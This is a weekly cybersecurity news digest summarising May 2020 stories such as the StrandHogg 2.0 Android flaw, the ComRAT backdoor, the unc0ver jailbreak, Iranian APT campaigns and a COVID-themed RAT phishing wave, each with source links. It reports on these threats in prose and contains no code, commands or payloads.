New Android Flaw Affecting Over 1 Billion Phones Let Attackers Hijack Apps
Remember Strandhogg?
A security vulnerability affecting Android that malicious apps can exploit to masquerade as any other app installed on a targeted device to display fake interfaces to the users, tricking them into giving away sensitive information. Late last year, at the time of its public disclosure, researchers also confirmed that some attackers were already exploiting the flaw in the wild to steal users’ banking and other login credentials, as well as to spy on their activities. The same team of Norwegian cybersecurity researchers today unveiled details of a new critical vulnerability (CVE-2020-0096) affecting the Android operating system that could allow attackers to carry out a much more sophisticated version of Strandhogg attack.
Source: The hacker news / Bleeping computer / Dark reading / Threatpost / Securityweek
Link: https://thehackernews.com/2020/05/stranhogg-android-vulnerability.html
Link: https://threatpost.com/strandhogg-2-critical-bug-android-app-hijacking/156058/
Link: https://www.securityweek.com/strandhogg-20-vulnerability-allows-hackers-hijack-android-devices
New ComRAT Malware Uses Gmail to Receive Commands and Exfiltrate Data
Cybersecurity researchers today uncovered a new advanced version of ComRAT backdoor, one of the earliest known backdoors used by the Turla APT group, that leverages Gmail’s web interface to covertly receive commands and exfiltrate sensitive data.
“ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020,” cybersecurity firm ESET said in a report shared with The Hacker News. “We identified at least three targets: two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.” Turla, also known as Snake, has been active for over a decade with a long history of the watering hole and spear-phishing campaigns against embassies and military organizations at least since 2004. The group’s espionage platform started off as Agent.BTZ, in 2007, before it evolved to ComRAT, in addition to gaining additional capabilities to achieve persistence and to steal data from a local network.
Source: The hacker news / Bleeping computer / Dark reading / Threatpost / Infosecurity magazine
Link: https://thehackernews.com/2020/05/gmail-malware-hacker.html
Link: https://threatpost.com/turla-apt-revamps-comrat/156051/
Link: https://www.infosecurity-magazine.com/news/version-turla-malware-threat/
New Tool Can Jailbreak Any iPhone and iPad Using An Unpatched 0-Day Bug
The hacking team behind the “unc0ver” jailbreaking tool has released a new version of the software that can unlock every single iPhone, including those running the latest iOS 13.5 version. Calling it the first zero-day jailbreak to be released since iOS 8, unc0ver’s lead developer Pwn20wnd said “every other jailbreak released since iOS 9 used 1day exploits that were either patched in the next beta version or the hardware.”
The group did not specify which vulnerability in iOS was exploited to develop the latest version.
Source: The hacker news / Threatpost / Securityweek
Link: https://thehackernews.com/2020/05/iphone-ios-jailbreak-tools.html
Link: https://threatpost.com/new-ios-jailbreak-tool-works-on-iphone-models-ios-11-to-ios-13-5/156045/
Link: https://www.securityweek.com/jailbreak-tool-updated-unlock-iphones-running-ios-135
Iranian APT Group Targets Governments in Kuwait and Saudi Arabia
Today, cybersecurity researchers shed light on an Iranian cyber espionage campaign directed against critical infrastructures in Kuwait and Saudi Arabia.
Bitdefender said the intelligence-gathering operations were conducted by Chafer APT (also known as APT39 or Remix Kitten), a threat actor known for its attacks on telecommunication and travel industries in the Middle East to collect personal information that serves the country’s geopolitical interests.
“Victims of the analyzed campaigns fit into the pattern preferred by this actor, such as air transport and government sectors in the Middle East,” the researchers said in a report (PDF) shared with The Hacker News, adding at least one of the attacks went undiscovered for more than a year and a half since 2018.
“The campaigns were based on several tools, including ‘living off the land’ tools, which makes attribution difficult, as well as different hacking tools and a custom-built backdoor.”
Source: The hacker news / Bitdefender whitepaper / Threatpost
Link: https://thehackernews.com/2020/05/iran-hackers-kuwait.html
Link: https://threatpost.com/chafer-apt-hits-middle-east-govs-with-latest-cyber-espionage-attacks/156002/
(Last) Week in Ransomware – May 22nd 2020 – Constantly Innovating
Ransomware operators continue to leak data for their victims and develop new ways to infect victims without being detected by security software. This week, we saw Snake ransomware leak data from Fresenius Medical Care, and REvil claims to have a buyer for the alleged data on President Trump. Many think, though, that this was nothing more than a PR stunt or never had the data in the first place. In addition, we saw an interesting technique used by the Ragnar Lock ransomware, where they encrypt victims using virtual machines to evade security software.
Source: Bleeping computer / Securityweek / SOPHOS blog
Link: https://www.securityweek.com/ragnar-locker-ransomware-uses-virtual-machines-evasion
Security 101: Cross-Site Scripting
In cyber security, attention is concentrated on the new — zero-day exploits, for example, are big news and big business. But old threats can still cause big problems for organizations, even when the threats are almost old enough to legally have a drink to celebrate their victories. Cross-site scripting, or XSS, was first described by Microsoft engineers on January 16, 2000. By 2007, it was considered the most common exploit for web-based applications. And in 2020 it is still one of the most common, and dangerous, exploit technique. So what, exactly, is XSS, and why is it still something we worry about today?
Source: Dark reading
Link: https://www.darkreading.com/theedge/security-101-cross-site-scripting/b/d-id/1337891
Silent Night: A New Malware-as-a-Service Banking Trojan Analyzed
Silent Night is a new sophisticated and heavily obfuscated Zloader/Zbot, ZeuS-derived banking trojan. In March 2020, both FireEye and IBM reported a malicious campaign targeting COVID-19 financial compensation schemes. FireEye called the malware payload ‘SILENTNIGHT’; IBM described it as a ZeuS Sphinx/Terdot variant. Together they are right. Silent Night is a new ZeuS derivative, currently being offered under the malware-as-a-service (MaaS) model.
Source: Securityweek / Malwarebytes
Link: https://www.securityweek.com/silent-night-new-malware-service-banking-trojan-analyzed
Link: https://resources.malwarebytes.com/files/2020/05/The-Silent-Night-Zloader-Zbot_Final.pdf
‘Coronavirus Report’ Emails Spread NetSupport RAT, Microsoft Warns
A recent spear-phishing campaign has been spotted spreading a weaponized NetSupport Manager remote access tool (RAT), which is a legitimate tool used for troubleshooting and tech support. Attackers use the ongoing coronavirus pandemic as a lure, as well as malicious Excel documents, to convince victims to execute the RAT. Researchers with Microsoft’s security intelligence team said this week that that the ongoing campaign started on May 12 and has used several hundred unique malicious Excel 4.0 attachments thus far – a trend that researchers said they’ve seen steadily increase over the past month. “The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload,” said the researchers in a series of tweets. “For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.”
Source: Threatpost / Infosecurity magazine
Link: https://threatpost.com/coronavirus-emails-netsupport-rat-microsoft/156026/
Link: https://www.infosecurity-magazine.com/news/microsoft-warns-of-massive-covid19/
Secjuice Squeeze Volume 25
Welcome to the 25th edition of the Secjuice Squeeze, a curated selection of interesting security articles and infosec news that you may have missed, lovingly curated for you on a weekly basis. This week’s volume compiled by Secjuice writers Prasanna, Devesh Chande, Mike Peterson, Manmeet Singh Bhatia, Sinwindie, Thunder-Son, Miguel Calles, and Hartoyo Wahyu.
Source: Secjuice
Link: https://www.secjuice.com/infosec-news-and-events-squeeze-vol-25/
Beginners Cybersecurity (4) – Intrusion
Welcome to my cybersecurity guide for beginners, in my (Andy74) first article, I gave an overview on the different phases of attack. This article focuses on the reason that everyone wants to be a hacker, intrusion.
Source: Secjuice
Link: https://www.secjuice.com/cybersecurity-for-beginners-part-4/
Link: https://www.secjuice.com/cybersecurity-for-beginners-part-3-weaponization/
Link: https://www.secjuice.com/reconnaissance-for-beginners/
Link: https://www.secjuice.com/penetration-testing-for-beginners-part-1-an-overview/